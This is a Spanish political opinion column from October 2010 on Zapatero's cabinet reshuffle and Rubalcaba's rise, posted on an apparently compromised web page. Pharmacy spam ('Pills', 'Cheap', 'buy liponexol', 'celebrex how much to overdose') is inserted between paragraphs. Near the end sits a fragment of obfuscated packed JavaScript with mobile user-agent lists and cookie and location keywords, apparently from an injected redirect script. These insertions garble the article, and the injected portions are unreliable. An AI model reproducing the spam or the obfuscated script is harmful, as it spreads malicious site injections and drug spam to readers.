• Noticias maquetadas 21.10.2010

    A FONDO
    CASIMIRO GARCÍA-ABADILLO

    Rubalcaba, el último refugio de Zapatero
    Ésa es la clave para interpretar la crisis de Gobierno en opinión de una persona cercana a Zapatero.

    La sangría es la desafección de cientos de miles de votantes socialistas que, según las encuestas (incluidas las que realiza el propio partido), han decidido en los últimos meses que ya no van a votar al PSOE.

    Para lograr ese objetivo, Zapatero echa mano de Rubalcaba como su tabla de salvación, dándole un poder hasta ahora desconocido para un miembro del Gobierno: le nombra vicepresidente primero y ministro portavoz, y le mantiene en Interior.

    Rubalcaba no sólo es el miembro del Gabinete mejor valorado por los ciudadanos, sino el más apreciado por los militantes socialistas. «Hoy, Rajoy se habrá llevado un buen susto, porque el PP es consciente de que Rubalcaba es el ministro más astuto y su peor enemigo», afirmaba ayer un miembro del Gobierno.

    En su vieja batalla contra la vicepresidenta primera, por fin Rubalcaba ha salido triunfante. Fernández de la Vega le advirtió al presidente el pasado domingo de que el nombramiento de Rubalcaba suponía una apuesta demasiado arriesgada por el pasado, pero Zapatero ya había tomado una decisión que marcará como ninguna otra el final de esta legislatura.

    Pills

    De la Vega se va triste, con la sensación de que el presidente no ha valorado su trabajo. Pero el circulo íntimo de Zapatero le ha insistido desde hace meses en que «el Gobierno no comunica bien». Y esa responsabilidad recaía sobre De la Vega, a la que no ha ayudado el incidente del cese fulminante y arbitrario de Belén Barreiro al frente del CIS.

    La comunicación, al final, ha acabado siendo casi una obsesión para Zapatero. De hecho, en su rueda de prensa de ayer insistió en resaltar lo «bien que se explica» Rubalcaba.

    Cheap

    También utilizó ese argumento al referirse a Ramón Jáuregui, eterno aspirante que, finalmente, entra en el Gobierno como ministro de la Presidencia. Veremos cómo funciona ese tándem en Moncloa. Rubalcaba ha vetado en varias ocasiones a Jáuregui para sorpresa de algunos miembros del Ejecutivo. Algún ministro interpreta su nombramiento (al principio, Zapatero pensó en él como titular de Trabajo) como una forma de contrapesar el irresistible ascenso de Rubalcaba.

    La apuesta no sólo tiene claves internas sino, sobre todo, una meta. Zapatero quiere que esta legislatura certifique el final de ETA, entre otras razones porque sabe que ese hecho podría darle una baza sólida para afrontar las elecciones de 2012, que se celebrarán todavía bajo el síndrome de la crisis y el paro.

    celebrex how much to overdose
    ?buy liponexol

    ¿Modificará el Gobierno su política antiterrorista para conseguirlo? ¿Dará la opción a Batasuna de presentarse a las elecciones municipales de la próxima primavera? Ésa es la inquietud que comienzan a sentir muchos ciudadanos que veían en el acuerdo con el PP en política antiterrorista el elemento más positivo de la gestión de Zapatero.

    Al dejar el timón en manos de su ministro del Interior, el presidente hace una apuesta inequívoca por el pasado. Los tres vicepresidentes (Rubalcaba, Salgado y Chaves) son viejas glorias del felipismo. Este déjà vu hace añicos la imagen del nuevo socialismo que quiso alumbrar Zapatero. El soufflé se viene abajo, y la mejor prueba de ello es que sus dos apuestas personales, los ministerios de Igualdad y Vivienda, desaparecen sin pena ni gloria. Aído y Corredor pasan a ser secretarias de Estado y se convierten en víctimas del ajuste.

    Pills

    Blanco, el otro hombre fuerte del Gobierno, no logra consolidar posiciones. De hecho, pierde la batalla por la Secretaría de Organización del PSOE (él apostaba por Elena Valenciano) que, tras la salida de Leire Pajín, ocupará el aragonés Marcelino Iglesias.

    Pajín, cuyo papel ha sido muy criticado por pesos pesados del partido, resulta premiada con el Ministerio de Sanidad. Premio a la fidelidad que también recibe Trinidad Jiménez, que, tras el fiasco de las primarias, ocupará la cartera de Exteriores (aunque seguro que mejora la nefasta gestión de Moratinos, que abandonó el cargo entre lágrimas).

    Rosa Aguilar (que ocupará la cartera de Medio Ambiente) y Valeriano Gómez (nuevo ministro de Trabajo) representan un efectista guiño a la izquierda de un Gobierno que ha perdido su perfil socialdemócrata desde que los mercados le hicieron a Zapatero darse de bruces con la realidad.

    Buy vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))

  • Comments are closed.

Calendario de artículos

octubre 2010
L M X J V S D
 123
45678910
11121314151617
18192021222324
25262728293031

Artículos anteriores